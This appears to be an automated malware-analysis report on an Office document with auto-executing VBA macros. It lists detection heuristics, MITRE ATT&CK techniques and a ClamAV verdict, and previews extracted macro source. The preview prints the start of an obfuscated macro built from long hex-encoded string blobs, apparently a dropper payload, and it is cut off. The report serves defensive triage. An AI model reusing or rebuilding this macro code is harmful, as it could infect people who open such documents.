MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open and Workbook_Open auto-execution macro, which is a strong indicator of malicious intent. The critical heuristic firing for Shell() call in VBA, combined with the presence of a VBA macro file named 'macros.bas', suggests that the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 8
-
ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20157 bytes |
SHA-256: 3c03eeaedb6ec4a7a3e8d2bf76032769ed41b5c5000b13530df9f143e5eb786c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 69 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Public Sub J_EMZ() Dim K_J As String Dim YIH_MM As String Dim TJ_VTS As String TJ_VTS = "AFBD8484848484845184846B846184655CB384B0849D848484ABA984AD848484837575719BB684A6A084845584848584848D488484AF7F8484709B9165887F56B99F84BB848484594F8184848484BB848484B98484A384847DC18A7F59808E8484848446848190848484B75684849EBC84A" Dim WTT_OC As String WTT_OC = "284846B84848A8484844684798C9184B9845E846DB1846C846C84849EC08484848284848D84848459848461838484B08484844786848484845E84BF6484AC4FB7B584846C848484845D4F89A284848484847484848F848EA381C0848484B184788084535D964F84866D847A846C8484C284" Dim B_VO As String B_VO = "7CAC846A849C849F5D60818484B2848484608484846A848467846EAA9846844A84849C845B5984958484844A849A91846BB6BB84847457844847848684845FAC8484848C5B844C4A7D84788484878484848456BB8484845981844672848445A1C3945484B484848484B7B68B84518484C48" Dim KKT_RL As String KKT_RL = "486848484845A84844A7D84798487755460849A8484688484AF849090695F84848284848C8484798484848456848484B9846E848484A28484849984598453A084848484BB63668484A78484848484BD84849C83844675A48470978465B884847F80845084B44D848493846C84474C8486A9" Dim CML_SN As String CML_SN = "91846284B6AD848484A78484848473B28484B18461938484BB7C846E90508453A05F84A284B6849BC27F8152A4847E8484AC848475AEC28484847684849C8484845584B884A18459A884988484638484A74EA0708460AD84BBB7848484847EC365AB7184BB7A519B849A5F5E84897884798" Dim XSP_EW As String XSP_EW = "48484B967BE8462849B8484A2C38484848455B371844A84A1459492778384C45D84B384848984849E7D8484848484BC8484848469758484C48484BE9C84845C84B08A847884849784785A848CC184A9A9848484729F846A84BD84C27E8484B284847F84508884848EBD8460844884A759C4" Dim VT_Q As String VT_Q = "778BBA8456A2AF84A85E844A8484848484849E8484849D84AD849661BA84606A4A9C6B6E846E9A8484B584B9B8888491846C74848484AE84624B84845DB98474848478A5C38484A084849D5D848669804A849284AFAF5F845184C40D8384BE848484A284A377849A464D56B07F869B58798" Dim ZY_LI As String ZY_LI = "4BB93BA848984B75A53847584846C8484845F845F5D5AAD56847C846084B2B94E8448B262525D728462848484AA8084575B84BD849884A27D52C0AD848484586F8484848484C184848484849D848484AF84498484C084A0847A548484848F68C3845A848C769E84C48451A2848484BA8484" Dim XJ_DZT As String XJ_DZT = "608484597A848484845A8A84844C91849E7EAAC48487B49C848499848484AD73AFA1848481844884848484845F8484B184C1BA848484846B74846C7084878484AD8484848484C1848469847F8484C1848484AE4AA0845B8461B2B651B44976848C848484848484936D846B84859884569B8" Dim K_QJK As String K_QJK = "484848484848484A4C378847B6584A384844684745F84BA8F84845E84845D58AF84849E484684846E608484849DB184BB84959A758484846CB9848084A9B5846251A884848484466C4A849484848884848484848484847684508459BA84B8848468848384984D8484BFA684A38484848484" Dim A_P As String A_P = "9F6E844E84976C8483588598A8789B8484848460B5848584A08484F4494D847C8EAA8480845B845A8497845B7398848F84555884849495668484884CB8848090B3845281658455BD86A084849A898484848484845F928459B084628484B05B8B84778BC46E5F84848484AFA7848C845B848" Dim H_VR As String H_VR = "C9B9884576C848484B484BE845384B490B69B84849F8484848484AB816684848484849984789DB87452846E84848484B6AA84848498848484BA5C848484844E844D638C845C5E8484A99D846C84845B5884C0848484A1849CB6BA84738484A884938484B6B084BD4D84927B8484BA844D84" Dim HPQ_ZC As String HPQ_ZC = "70849CAA7B8484848461B684879D89B2849F8D55A04F84846B84B28484846A84B78473849A7684848484B58484B5849F568484C1848484A584678E4E8B9084845A847A6D847984B884A48477B58494847EABBE8484A7978484849F848469846984848484B74E8C5E8A717B847384A084865" Dim ZM_D As String ZM_D = "1847A718477849C66C0A184847F8453847CBF8484A27784847A6147844CA2A5908484848484849F608484A3778484648469C49B8A84488479C25AC3845F638484A584765B849F8484BAAB848547658984777D84849884849884A48484AC8484848446844E84849856848484BF847F758484" Dim V_C As String V_C = "5F845287B6846A848F8489848450C2756484BF78B37D74848468 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.